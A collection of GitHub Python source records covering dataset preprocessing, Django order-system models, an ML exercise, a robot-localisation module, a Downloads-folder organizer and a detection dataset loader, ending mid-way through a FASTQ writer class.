+{"seq_id":"2661766584","text":"\"\"\"\nThis file shall create the file which steers the creation of the frame folders later\nGiven the initial annotation file, the following steps are executed\n1) exclude unlabeled samples\n2) reduce to in scope classes since producing the frames for all classes takes too long\n3) exclude later frame, if two frames are annotated per video\n4) reduce duplicated records due to multiple bounding boxes or several actions per bounding box\n\"\"\"\nimport os\nimport pandas as pd\n\norig_annot = 'sdf/srv/beegfs02/scratch/da_action/data/kinetics700/ava-kinetics/ava_kinetics_v1_0/kinetics_val_v1.0.csv'\ntarget_steer = 'sdf/srv/beegfs02/scratch/da_action/data/kinetics700/csv_steer/10_cl_val_frames.csv'\n\n\nclasses = [80,79,74,11,17,14,59,1,8,49]\n\nkinetics_all = pd.read_csv(orig_annot, header=None, sep='\\n')\nkinetics_all = kinetics_all[0].str.split(',', expand=True)\nprint('initial length:', len(kinetics_all[0]))\n\n# 1) Drop None rows\nkinetics_all = kinetics_all.dropna(axis=0, how=\"any\")\nprint('after none:', len(kinetics_all[0]))\n\nkinetics_all[6] = kinetics_all[6].astype(int)\n\n# 2) Exclude not considered classes\nkinetics_all = kinetics_all.loc[kinetics_all[6].isin(classes)]\nprint('after classes:', len(kinetics_all[0]))\n\n# 3) Exclude duplicate frames per video\n# 4) reduce duplicate records due to multiple bounding boxes or several actions per bounding box\n# Create helper that does not contain duplicates considering first two columns\nkinetics_helper = kinetics_all.drop_duplicates(subset=[0,1], keep='first')\nkinetics_helper = kinetics_helper.drop_duplicates(subset=[0], keep='first')\n\n# Save the file needed to produce the kinetics frames\nkinetics_frames = kinetics_helper[[0,1]]\nprint('number of frames to save', len(kinetics_frames[0]))\nkinetics_frames.to_csv(target_steer, header=None, index=False, float_format='%.3f')\n\n\n# Produce the corresponding ground truth annotation file containing the annotations for all the saved frames\n\"\"\"\nframes = []\nfor index, row in kinetics_frames.iterrows():\n frames.append(kinetics_all.loc[(kinetics_all[0] == row[0]) & (kinetics_all[1] == row[1])])\n\nkinetics_gt = pd.concat(frames)\nprint('gt_list', len(kinetics_gt[0]))\n\nava_train_pred.to_csv(os.path.join(annot_dir, 'ava_train_predicted_boxes.csv'), header=None,\n # index=False, float_format='%.3f')\n\n\"\"\"\n","repo_name":"Rishabh-eth/action_detection","sub_path":"get_datasets/kinetics/01_csv_steer_keyframe.py","file_name":"01_csv_steer_keyframe.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33251572335","text":"import datetime\nfrom django.db import models\nfrom django.conf import settings\nfrom django.shortcuts import redirect, reverse\nfrom django.utils import timezone\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.utils.translation import gettext_lazy as _\nfrom djangoordersystem.managers import CustomUserManager\nfrom django.contrib.auth.models import AbstractBaseUser, PermissionsMixin\nfrom phonenumber_field.modelfields import PhoneNumberField\nfrom django.utils.text import slugify\n\n\n\n\nclass PaymentMethod(models.IntegerChoices):\n CASH = 1, \"Cash\"\n GCASH = 2, \"GCash\"\n\nclass CustomUser(AbstractBaseUser, PermissionsMixin):\n id = models.AutoField(primary_key=True)\n email = models.EmailField(_(\"email address\"), unique=True)\n picture = models.ImageField(\n upload_to='images/', blank=True, null=True, default='')\n is_staff = models.BooleanField(default=False)\n is_active = models.BooleanField(default=True)\n date_joined = models.DateTimeField(default=timezone.now)\n is_technician = models.BooleanField(default=False)\n\n USERNAME_FIELD = \"email\"\n REQUIRED_FIELDS = []\n\n objects = CustomUserManager()\n\n def __str__(self):\n return self.email\n\n class Meta:\n verbose_name = \"User\"\n\nclass UserProfile(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, blank=False)\n first_name = models.CharField(max_length=30, default='', blank=False)\n middle_name = models.CharField(max_length=30, default='')\n last_name = models.CharField(max_length=30, default='', blank=False)\n\n def __str__(self):\n return f'{self.first_name} {self.last_name}'\n\n\nclass TechnicianProfile(UserProfile):\n pass\n\nclass Service(models.Model):\n name = models.CharField(max_length=255)\n price = models.FloatField(default=0, validators=[MinValueValidator(0)])\n discounted_price = models.FloatField(\n default=0, validators=[MinValueValidator(0),])\n description = models.TextField(blank=True, null=True)\n thumbnail = models.ImageField(\n upload_to='images/', blank=True, null=True, default='')\n slug = models.SlugField()\n\n product_created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n def add_to_cart(self):\n return reverse('system:add-to-cart', kwargs={'slug': self.slug})\n\n def save(self, *args, **kwargs):\n self.slug = slugify(self.name)\n super(Service, self).save(*args, **kwargs)\n\nclass Status(models.IntegerChoices):\n PENDING = 1, \"Pending\"\n ON_THE_WAY = 2, \"On the way\"\n ONGOING = 3, \"Ongoing\"\n DONE = 4, \"Done\"\n\nclass Order(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)\n status = models.PositiveIntegerField(\n default=Status.PENDING, choices=Status.choices)\n order_started = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return f\"{self.id}\"\n\n \n\ndef receipt_no_gen() -> str:\n today = datetime.date.today()\n today_string = today.strftime('%y%m%d')\n next_invoice_number = '01'\n last_invoice = OrderService.objects.filter(\n receipt_no__startswith=today_string).order_by('receipt_no').last()\n if last_invoice:\n last_invoice_number = int(last_invoice.receipt_no[6:])\n next_invoice_number = '{0:02d}'.format(last_invoice_number + 1)\n return today_string + next_invoice_number\n\n\nclass BillingInfo(models.Model):\n address = models.CharField(max_length=100)\n province = models.CharField(max_length=100)\n city = models.CharField(max_length=50)\n brgy = models.CharField(max_length=50)\n zip_code = models.PositiveBigIntegerField(blank=False, default=1234)\n\n def __str__(self):\n return self.address\n\n\nclass OrderService(models.Model):\n receipt_no = models.CharField(\n max_length=8, primary_key=True, default=receipt_no_gen)\n user = models.ForeignKey(CustomUser,\n on_delete=models.CASCADE)\n service = models.ForeignKey(Service, on_delete=models.CASCADE)\n billing_info = models.ForeignKey(BillingInfo, on_delete=models.CASCADE, null=True)\n order = models.ForeignKey(Order, on_delete=models.CASCADE)\n confirmed = models.BooleanField(default=False)\n quantity = models.IntegerField(default=1)\n\n added_on = models.DateTimeField(auto_now_add=True)\n paid = models.BooleanField(default=False)\n payment_method = models.PositiveIntegerField(\n default=PaymentMethod.CASH, choices=PaymentMethod.choices)\n\n scheduled_date = models.DateTimeField(auto_now_add=True)\n gcash_number = PhoneNumberField(region='PH', null=True)\n total_price = models.FloatField(\n validators=[MinValueValidator(0)], default=0)\n\n @property\n def price(self):\n if self.service.price:\n return self.service.price * self.quantity\n elif self.service.discounted_price:\n return self.service.discounted_price * self.quantity\n return 0\n\n def __str__(self):\n return self.receipt_no\n\n\nclass Task(models.Model):\n order = models.OneToOneField(OrderService, on_delete=models.CASCADE)\n technician = models.ForeignKey(TechnicianProfile, on_delete=models.CASCADE)\n date_assigned = models.DateTimeField(auto_now_add=True)\n date_finished = models.DateTimeField(null=True)\n \n class Meta:\n unique_together = ('order', 'technician')\n\n def __str__(self):\n return f'{self.order.receipt_no}-{self.technician}'\n\n def save(self, *args, **kwargs):\n if self.order.order.status == Status.DONE:\n self.date_finished = timezone.now()\n else:\n self.date_finished = None\n return super().save(*args, **kwargs)\n\n\nclass ServiceFeedback(models.Model):\n task = models.ForeignKey(Task, on_delete=models.SET_NULL, null=True)\n feedback = models.CharField(max_length=256, blank=False, default='')\n rating = models.IntegerField(default=0, validators=(MinValueValidator(0), MaxValueValidator(5)))\n date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return f'{self.task.order.receipt_no}-{self.task.technician}'","repo_name":"amiel-danao/green-cool-aircondition","sub_path":"system/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34586323438","text":"# Задача-1:\n# Следующая программа написана верно, однако содержит места потенциальных ошибок.\n# используя конструкцию try добавьте в код обработку соответствующих исключений.\n# Пример.\n# Исходная программа:\ndef avg(a, b):\n try:\n result = (a * b) ** 0.5\n except Exception as e:\n result = None\n return result\n\n\n\nprint(avg(5, 6))\nprint(avg([1, 2],2))\n\n\n\n\n# ПРИМЕЧАНИЕ: Для решения задач 2-4 необходимо познакомиться с модулями os, sys!\n# СМ.: https://pythonworld.ru/moduli/modul-os.html, https://pythonworld.ru/moduli/modul-sys.html","repo_name":"Dinar1996/qaz","sub_path":"lesson6/homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26958578271","text":"import torch\nimport numpy as np\n\nfrom pathlib import Path\nfrom typing import Dict, List, TypeVar, Union, Optional\n\nfrom torch import Tensor\n\nfrom config.config import CacheCfg\nfrom utils.util_types import TensorType\n\nEncodedInstance = TypeVar(\"EncodedInstance\")\n\nCONTEXT = {\n \"device\": torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\"),\n \"dtype\": torch.float32,\n}\n\n\nclass Cacher:\n def __init__(self, cache_path: Path, tensor_type: TensorType):\n mkdir_if_not_exist(cache_path)\n\n self.path = cache_path\n self.tensor_type = tensor_type\n self.cached_ids = set(el.name for el in self.path.iterdir() if el.is_dir())\n\n @staticmethod\n def from_config(config: CacheCfg) -> \"Cacher\":\n return Cacher(config.path, config.tensor_type)\n\n def create_cache(self, hash: str, encoded_instance: Dict[str, EncodedInstance]) -> None:\n instance_dir_path = self.path / hash\n mkdir_if_not_exist(instance_dir_path)\n tensor_dir_path = instance_dir_path / str(self.tensor_type.value)\n mkdir_if_not_exist(tensor_dir_path)\n self.write_tensors(tensor_dir_path / \"input_ids\", encoded_instance[\"input_ids\"])\n self.write_tensors(tensor_dir_path / \"tensors\", encoded_instance[\"tensors\"])\n self.write_original_tokens_ids(\n instance_dir_path / \"original_tokens.txt\", encoded_instance[\"original_tokens\"] # type: ignore\n )\n self.cached_ids = set(el.name for el in self.path.iterdir() if el.is_dir())\n\n def get_from_cache(self, hash: str) -> Optional[Dict[str, EncodedInstance]]:\n if hash not in self.cached_ids:\n return None\n instance_dir_path = self.path / hash\n tensor_dir_path = instance_dir_path / str(self.tensor_type.value)\n input_ids = self.load_tensor(tensor_dir_path / \"input_ids\") # type: ignore\n tensors = self.load_tensor(tensor_dir_path / \"tensors\") # type: ignore\n return {\n \"input_ids\": input_ids.to(\n CONTEXT[\"device\"] if isinstance(input_ids, torch.Tensor) else input_ids\n ),\n \"tensors\": tensors.to(CONTEXT[\"device\"] if isinstance(tensors, torch.Tensor) else tensors),\n \"original_tokens\": self.load_original_tokens_ids(instance_dir_path / \"original_tokens.txt\"), # type: ignore\n }\n\n def write_tensors(self, path: Path, tensor: EncodedInstance) -> None:\n if self.tensor_type == TensorType.torch:\n torch.save(tensor, path.parent / (path.name + \".pt\"))\n else:\n raise Exception(\"Not implemented for this type of tensor...\")\n\n def load_tensor(self, path) -> EncodedInstance:\n if self.tensor_type == TensorType.torch:\n return torch.load(path.parent / (path.name + \".pt\"))\n else:\n raise Exception(\"Not implemented for this type of tensor...\")\n\n @staticmethod\n def write_original_tokens_ids(path: Path, token_ids: List[List[int]]) -> None:\n with open(path, \"w\") as f:\n for token in token_ids:\n f.write(\"%s\\n\" % \" \".join([str(t) for t in token]))\n\n @staticmethod\n def load_original_tokens_ids(path: Path) -> List[List[int]]:\n token_ids = []\n with open(path, \"r\") as f:\n for line in f.readlines():\n token_ids.append([int(val) for val in line.strip().split()])\n return token_ids\n\n\ndef mkdir_if_not_exist(path: Path) -> None:\n if not path.is_dir():\n path.mkdir()\n","repo_name":"sahanmar/orchid_legacy","sub_path":"data_processing/cacher.py","file_name":"cacher.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30350843187","text":"# Machine Learning Online Class - Exercise 2: Logistic Regression\n#\n# Instructions\n# ------------\n#\n# This file contains code that helps you get started on the second part\n# of the exercise which covers regularization with logistic regression.\n#\n# You will need to complete the following functions in this exercise:\n#\n# sigmoid.m\n# costFunction.m\n# predict.m\n# costFunctionReg.m\n#\n# For this exercise, you will not need to change any code in this file,\n# or any other files other than those mentioned above.\nimport copy\n\n# Initialization\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import optimize as opt\n\nfrom plotData import plot_data\nfrom mapFeature import map_feature\nfrom costFunctionReg import cost_function_reg\nfrom drawBoundary import draw_boundary\nfrom predict import predict\n\nnp.random.seed(1)\n\n\n# Load Data\ndef main_reg():\n data = np.loadtxt('ex2data2.txt', delimiter=',')\n X = data[:, 0:2]\n y = data[:, 2]\n\n X_init = copy.deepcopy(X)\n\n plot_data(X, y)\n\n plt.show()\n\n # =========== Part 1: Regularized Logistic Regression ============\n # Add Polynomial Features\n\n # Note that mapFeature also adds a column of ones for us, so the intercept term is handled\n X = map_feature(X[:, 0], X[:, 1])\n\n # Initialize fitting parameters\n initial_theta = np.zeros(X.shape[1])\n\n # Set regularization parameter lambda to 1\n lambda_ = 1\n\n # Compute and display initial cost and gradient for regularized logistic regression\n cost, grad = cost_function_reg(initial_theta, X, y, lambda_)\n print(f'Cost at initial theta (zeros): {cost}')\n\n # ============= Part 2: Regularization and Accuracies =============\n # Optional Exercise: In this part, you will get\n # to try different values of lambda and see how regularization affects the decision boundary.\n # Try the following values of lambda (0, 1, 10, 100).\n\n # Initialize fitting parameters\n initial_theta = np.zeros(X.shape[1])\n\n # Set regularization parameter lambda to 1 (you should vary this)\n lambda_ = 10\n\n # Set Options\n options = {'maxfun': 400}\n\n # Optimize\n res = opt.minimize(cost_function_reg, initial_theta, args=(X, y, lambda_), jac=True, method='TNC', options=options)\n theta = res.x\n\n # Plot Boundary\n draw_boundary(theta, X_init, y)\n\n # Labels and Legend\n\n # Compute accuracy on our training set\n p = predict(theta, X)\n print(f'Train Accuracy: {np.mean(p == y) * 100}')\n\n\nif __name__ == '__main__':\n main_reg()\n","repo_name":"ruaruazero/MachineLearning2023","sub_path":"assignment/course4/exercise1/ex2_reg.py","file_name":"ex2_reg.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21828847959","text":"import logging\nimport math\nfrom dataclasses import dataclass\nfrom enum import Enum\nfrom typing import List\n\nimport numpy as np\n\nimport reactives\nfrom geometry import two_points_90, pts_same_side, three_pts_angle, normalize_angle, midpoint, intersection, \\\n Point, line, parallel_line, distance\n\nROBOT_UNIT = 5 # cm\n# distance from robot's center (the two wheels' middle point) to it's tail (the red light)\n\nfound = reactives.Subject()\nnot_found = reactives.Subject()\n\n\n@dataclass\nclass ProcessedImg:\n img: np.ndarray\n blue_pts: List[tuple]\n red_pts: List[tuple]\n\n\n@dataclass\nclass Object:\n pos: Point\n angle: float\n dist: float\n\n\nclass NotFoundCase(Enum):\n UNDEF = 0\n MANY_POINTS = 1\n FEW_POINTS = 2\n\n\ndef find(processed_img: ProcessedImg):\n if (\n len(processed_img.blue_pts) != 2\n or\n len(processed_img.red_pts) != 1\n ):\n return _handle_not_found(processed_img.blue_pts, processed_img.red_pts)\n\n try:\n (height, width, _) = processed_img.img.shape\n robot = transform(\n wheel1=Point(*processed_img.blue_pts[0]),\n wheel2=Point(*processed_img.blue_pts[1]),\n tail=Point(*processed_img.red_pts[0]),\n scene_center=Point(width / 2, height / 2),\n )\n logging.info(\"Robot FOUND!!!\")\n logging.debug(\"Robot: %s\", robot)\n found.on_next((robot, processed_img))\n except Exception as e:\n logging.error(\"Error while transforming robot parameters.\", exc_info=e)\n not_found.on_next(NotFoundCase.UNDEF)\n\n\ndef transform(\n wheel1: Point,\n wheel2: Point,\n tail: Point,\n scene_center: Point,\n):\n \"\"\"\n :return: (\n robot_position, # position against scene center;\n angle, # angle against scene center;\n distance, # distance to scene center;\n )\n \"\"\"\n robot_center = midpoint(wheel1, wheel2)\n\n # finds the tail point's prime and its projection line - the main one\n tail_prime = two_points_90(wheel1, robot_center)\n intersection_line = line(wheel1, wheel2)\n if not pts_same_side(tail, tail_prime, intersection_line):\n tail_prime = two_points_90(wheel2, robot_center)\n main_projection_line = line(tail, tail_prime)\n\n # finds center line's prime\n center_line = line(scene_center, robot_center)\n side_line = line(tail, wheel1)\n side_intersection = intersection(center_line, side_line)\n if side_intersection:\n side_line_prime = line(tail_prime, wheel1)\n else:\n side_line = line(tail, wheel2)\n side_intersection = intersection(center_line, side_line)\n side_line_prime = line(tail_prime, wheel2)\n\n # noinspection PyTypeChecker\n side_intersection_projection_line = parallel_line(main_projection_line, side_intersection)\n side_intersection_prime = intersection(side_line_prime, side_intersection_projection_line)\n center_line_prime = line(robot_center, side_intersection_prime)\n\n # computes position, angle and distance\n center_line_projection = parallel_line(main_projection_line, scene_center)\n center_prime = intersection(center_line_projection, center_line_prime)\n dist = distance(center_prime, robot_center) / distance(robot_center, tail_prime)\n robot_position = robot_center - center_prime\n angle = math.degrees(normalize_angle(\n three_pts_angle(tail_prime, robot_center, center_prime) - math.pi))\n return Object(robot_position, angle, (dist * ROBOT_UNIT))\n\n\ndef _handle_not_found(blue_points, red_points):\n blue_cnt = len(blue_points)\n red_cnt = len(red_points)\n if blue_cnt >= 2 and red_cnt >= 1:\n case = NotFoundCase.MANY_POINTS\n elif blue_cnt <= 2 and red_cnt <= 1:\n case = NotFoundCase.FEW_POINTS\n else:\n case = NotFoundCase.UNDEF\n logging.warning(\"Robot NOT FOUND... - %s\", case)\n not_found.on_next(case)\n","repo_name":"d-zhelyazkov/selfie-robot-2","sub_path":"src/robot_finder.py","file_name":"robot_finder.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4005295228","text":"import os\r\nimport collections\r\n\r\nDOWNLOADS = os.path.join(os.path.expanduser('~'), 'Downloads')\r\n\r\nmapping = collections.defaultdict()\r\nfor f in os.listdir(DOWNLOADS):\r\n if not os.path.isdir(os.path.join(DOWNLOADS, f)):\r\n file_type = f.split('.')[-1]\r\n mapping.setdefault(file_type, []).append(f)\r\n\r\nfor folder_name, folder_items in mapping.items():\r\n folder_path = os.path.join(DOWNLOADS, folder_name)\r\n if not os.path.exists(folder_path):\r\n os.mkdir(folder_path)\r\n\r\n for folder_item in folder_items:\r\n source = os.path.join(DOWNLOADS, folder_item)\r\n destination = os.path.join(folder_path, folder_item)\r\n print(f'Moving {source} to {destination}')\r\n os.rename(source, destination)","repo_name":"satyamchaturvedi/Folder-Organizer","sub_path":"organizer.py","file_name":"organizer.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"2899656808","text":"import os\nimport numpy as np\n\ntry:\n from collections.abc import Sequence\nexcept Exception:\n from collections import Sequence\n\nfrom ppdet.core.workspace import register, serializable\nfrom ppdet.utils.download import get_dataset_path\n\n\n@serializable\nclass DataSet(object):\n \"\"\"\n Dataset, e.g., coco, pascal voc\n\n Args:\n annotation (str): annotation file path\n image_dir (str): directory where image files are stored\n shuffle (bool): shuffle samples\n \"\"\"\n\n def __init__(self,\n dataset_dir=None,\n image_dir=None,\n anno_path=None,\n sample_num=-1,\n with_background=True,\n use_default_label=None,\n **kwargs):\n super(DataSet, self).__init__()\n self.anno_path = anno_path\n self.image_dir = image_dir if image_dir is not None else ''\n self.dataset_dir = dataset_dir if dataset_dir is not None else ''\n self.sample_num = sample_num\n self.with_background = with_background\n self.use_default_label = use_default_label\n\n self.cname2cid = None\n self._imid2path = None\n\n def load_roidb_and_cname2cid(self):\n \"\"\"load dataset\"\"\"\n raise NotImplementedError('%s.load_roidb_and_cname2cid not available' %\n (self.__class__.__name__))\n\n def get_roidb(self):\n if not self.roidbs:\n data_dir = get_dataset_path(self.dataset_dir, self.anno_path,\n self.image_dir)\n if data_dir:\n self.dataset_dir = data_dir\n self.load_roidb_and_cname2cid()\n\n return self.roidbs\n\n def get_cname2cid(self):\n if not self.cname2cid:\n self.load_roidb_and_cname2cid()\n return self.cname2cid\n\n def get_anno(self):\n if self.anno_path is None:\n return\n return os.path.join(self.dataset_dir, self.anno_path)\n\n def get_imid2path(self):\n return self._imid2path\n\n\ndef _is_valid_file(f, extensions=('.jpg', '.jpeg', '.png', '.bmp')):\n return f.lower().endswith(extensions)\n\n\ndef _make_dataset(dir):\n dir = os.path.expanduser(dir)\n if not os.path.isdir(d):\n raise ('{} should be a dir'.format(dir))\n images = []\n for root, _, fnames in sorted(os.walk(dir, followlinks=True)):\n for fname in sorted(fnames):\n path = os.path.join(root, fname)\n if is_valid_file(path):\n images.append(path)\n return images\n\n\n@register\n@serializable\nclass ImageFolder(DataSet):\n \"\"\"\n Args:\n dataset_dir (str): root directory for dataset.\n image_dir(list|str): list of image folders or list of image files\n anno_path (str): annotation file path.\n samples (int): number of samples to load, -1 means all\n \"\"\"\n\n def __init__(self,\n dataset_dir=None,\n image_dir=None,\n anno_path=None,\n sample_num=-1,\n with_background=True,\n use_default_label=None,\n **kwargs):\n super(ImageFolder, self).__init__(dataset_dir, image_dir, anno_path,\n sample_num, with_background,\n use_default_label)\n self.roidbs = None\n self._imid2path = {}\n\n def get_roidb(self):\n if not self.roidbs:\n self.roidbs = self._load_images()\n return self.roidbs\n\n def set_images(self, images):\n self.image_dir = images\n self.roidbs = self._load_images()\n\n def _parse(self):\n image_dir = self.image_dir\n if not isinstance(image_dir, Sequence):\n image_dir = [image_dir]\n images = []\n for im_dir in image_dir:\n if os.path.isdir(im_dir):\n im_dir = os.path.join(self.dataset_dir, im_dir)\n images.extend(_make_dataset(im_dir))\n elif os.path.isfile(im_dir) and _is_valid_file(im_dir):\n images.append(im_dir)\n return images\n\n def _load_images(self):\n images = self._parse()\n ct = 0\n records = []\n for image in images:\n assert image != '' and os.path.isfile(image), \\\n \"Image {} not found\".format(image)\n if self.sample_num > 0 and ct >= self.sample_num:\n break\n rec = {'im_id': np.array([ct]), 'im_file': image}\n self._imid2path[ct] = image\n ct += 1\n records.append(rec)\n assert len(records) > 0, \"No image file found\"\n return records\n","repo_name":"Sharpiless/yolov3-vehicle-detection-paddle","sub_path":"ppdet/data/source/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"38"} +{"seq_id":"41157810678","text":"import functools\nfrom typing import Tuple, Optional, Callable, Dict\n\nimport torch\nfrom torch.utils.data import Dataset, Sampler, RandomSampler\n\nfrom dlrm.data.datasets import SyntheticDataset, ParametricDataset\nfrom dlrm.data.defaults import TEST_MAPPING, TRAIN_MAPPING\nfrom dlrm.data.feature_spec import FeatureSpec\nfrom dlrm.data.samplers import RandomDistributedSampler\nfrom dlrm.data.utils import collate_split_tensors\nfrom dlrm.utils.distributed import is_distributed, get_rank\n\n\nclass DatasetFactory:\n\n def __init__(self, flags, device_mapping: Optional[Dict] = None):\n self._flags = flags\n self._device_mapping = device_mapping\n\n def create_collate_fn(self) -> Optional[Callable]:\n raise NotImplementedError()\n\n def create_datasets(self) -> Tuple[Dataset, Dataset]:\n raise NotImplementedError()\n\n def create_sampler(self, dataset: Dataset) -> Optional[Sampler]:\n return RandomDistributedSampler(dataset) if is_distributed() else RandomSampler(dataset)\n\n def create_data_loader(\n self,\n dataset,\n collate_fn: Optional[Callable] = None,\n sampler: Optional[Sampler] = None):\n return torch.utils.data.DataLoader(\n dataset, collate_fn=collate_fn, sampler=sampler, batch_size=None,\n num_workers=0, pin_memory=False\n )\n\n\nclass SyntheticGpuDatasetFactory(DatasetFactory):\n def __init__(self, flags, local_numerical_features_num, local_categorical_feature_sizes):\n self.local_numerical_features = local_numerical_features_num\n self.local_categorical_features = local_categorical_feature_sizes\n super().__init__(flags)\n\n def create_collate_fn(self) -> Optional[Callable]:\n return None\n\n def create_sampler(self, dataset) -> Optional[Sampler]:\n return None\n\n def create_datasets(self) -> Tuple[Dataset, Dataset]:\n flags = self._flags\n dataset_train = SyntheticDataset(num_entries=flags.synthetic_dataset_num_entries,\n batch_size=flags.batch_size,\n numerical_features=self.local_numerical_features,\n categorical_feature_sizes=self.local_categorical_features)\n\n dataset_test = SyntheticDataset(num_entries=flags.synthetic_dataset_num_entries,\n batch_size=flags.test_batch_size,\n numerical_features=self.local_numerical_features,\n categorical_feature_sizes=self.local_categorical_features)\n return dataset_train, dataset_test\n\n\nclass ParametricDatasetFactory(DatasetFactory):\n\n def __init__(self, flags, feature_spec: FeatureSpec, numerical_features_enabled, categorical_features_to_read):\n super().__init__(flags)\n self._base_device = flags.base_device\n self._train_batch_size = flags.batch_size\n self._test_batch_size = flags.test_batch_size\n self._feature_spec = feature_spec\n self._numerical_features_enabled = numerical_features_enabled\n self._categorical_features_to_read = categorical_features_to_read\n\n def create_collate_fn(self):\n orig_stream = torch.cuda.current_stream() if self._base_device == 'cuda' else None\n return functools.partial(\n collate_split_tensors,\n device=self._base_device,\n orig_stream=orig_stream,\n numerical_type=torch.float32\n )\n\n def create_datasets(self) -> Tuple[Dataset, Dataset]:\n # prefetching is currently unsupported if using the batch-wise shuffle\n prefetch_depth = 0 if self._flags.shuffle_batch_order else 10\n\n dataset_train = ParametricDataset(\n feature_spec=self._feature_spec,\n mapping=TRAIN_MAPPING,\n batch_size=self._train_batch_size,\n numerical_features_enabled=self._numerical_features_enabled,\n categorical_features_to_read=self._categorical_features_to_read,\n prefetch_depth=prefetch_depth\n )\n\n dataset_test = ParametricDataset(\n feature_spec=self._feature_spec,\n mapping=TEST_MAPPING,\n batch_size=self._test_batch_size,\n numerical_features_enabled=self._numerical_features_enabled,\n categorical_features_to_read=self._categorical_features_to_read,\n prefetch_depth=prefetch_depth\n )\n\n return dataset_train, dataset_test\n\n\ndef create_dataset_factory(flags, feature_spec: FeatureSpec, device_mapping: Optional[dict] = None) -> DatasetFactory:\n \"\"\"\n By default each dataset can be used in single GPU or distributed setting - please keep that in mind when adding\n new datasets. Distributed case requires selection of categorical features provided in `device_mapping`\n (see `DatasetFactory#create_collate_fn`).\n\n :param flags:\n :param device_mapping: dict, information about model bottom mlp and embeddings devices assignment\n :return:\n \"\"\"\n dataset_type = flags.dataset_type\n num_numerical_features = feature_spec.get_number_of_numerical_features()\n if is_distributed() or device_mapping:\n assert device_mapping is not None, \"Distributed dataset requires information about model device mapping.\"\n rank = get_rank()\n local_categorical_positions = device_mapping[\"embedding\"][rank]\n numerical_features_enabled = device_mapping[\"bottom_mlp\"] == rank\n else:\n local_categorical_positions = list(range(len(feature_spec.get_categorical_feature_names())))\n numerical_features_enabled = True\n\n if dataset_type == \"parametric\":\n local_categorical_names = feature_spec.cat_positions_to_names(local_categorical_positions)\n return ParametricDatasetFactory(flags=flags, feature_spec=feature_spec,\n numerical_features_enabled=numerical_features_enabled,\n categorical_features_to_read=local_categorical_names\n )\n if dataset_type == \"synthetic_gpu\":\n local_numerical_features = num_numerical_features if numerical_features_enabled else 0\n world_categorical_sizes = feature_spec.get_categorical_sizes()\n local_categorical_sizes = [world_categorical_sizes[i] for i in local_categorical_positions]\n return SyntheticGpuDatasetFactory(flags, local_numerical_features_num=local_numerical_features,\n local_categorical_feature_sizes=local_categorical_sizes)\n\n raise NotImplementedError(f\"unknown dataset type: {dataset_type}\")\n","repo_name":"NVIDIA/DeepLearningExamples","sub_path":"PyTorch/Recommendation/DLRM/dlrm/data/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":6676,"program_lang":"python","lang":"en","doc_type":"code","stars":11741,"dataset":"github-code","pt":"38"} +{"seq_id":"71654201710","text":"import itertools\nimport random\n\n\ndef cal_energy(x, y, distance):\n minm = float(\"inf\")\n flag = 1\n new_x = []\n l = y\n energy = 0\n while(flag):\n for i in range(4):\n for j in range(4):\n for k in range(4):\n if k == 3:\n index = -1\n else:\n index = k\n energy = energy + 0.5 * \\\n (distance[i][j])*(x[l][i][k])*(x[l][j][index+1])\n print(\" Energy for: \", x[l], \" is: \", energy)\n if energy <= minm:\n minm = energy\n new_x = x[l]\n if l < len(x)-1:\n l += 1\n else:\n l = 0\n if l == y:\n flag = 0\n energy = 0\n return new_x\n\n\ndef main():\n comb = ([[0, 0, 0, 1], [0, 1, 0, 0], [0, 0, 1, 0], [1, 0, 0, 0]])\n x = list(itertools.permutations(comb))\n y = random.randint(0, len(x))\n # print(x)\n # points located at (0,0),(0,1),(1,1),(1,0)\n ## D(1,0) ------- C(1,1)\n # | |\n # | |\n # | |\n ## A(0,0) ------- B(0,1)\n distance = ([[0, 1, (2)**0.5, 1], [1, 0, 1, (2)**0.5],\n [(2)**0.5, 1, 0, 1], [1, 1, (2)**0.5, 0]])\n # print(\"Distance Matrix is: \", distance)\n print(\"Points are: (0,0),(0,1),(1,0),(1,1)\")\n new_x = cal_energy(x, y, distance)\n print(\"Path to be follwed:\", new_x)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"starkblaze01/Artificial-Intelligence-Codes","sub_path":"Hopfield Network/tsp.py","file_name":"tsp.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"38"} +{"seq_id":"42398710367","text":"import pathlib\nimport gzip\nimport ntpath\nimport magic\n\n__author__ = 'Dennis A. Simpson'\n__version__ = \"1.1.0\"\n\n\nclass Writer:\n \"\"\"\n Write new FASTQ file.\n \"\"\"\n __slots__ = ['log', 'file']\n\n def __init__(self, log, out_file_string):\n \"\"\"\n\n :param log:\n :param out_file_string:\n \"\"\"\n self.file = open(out_file_string, \"w\")\n self.log = log\n\n def 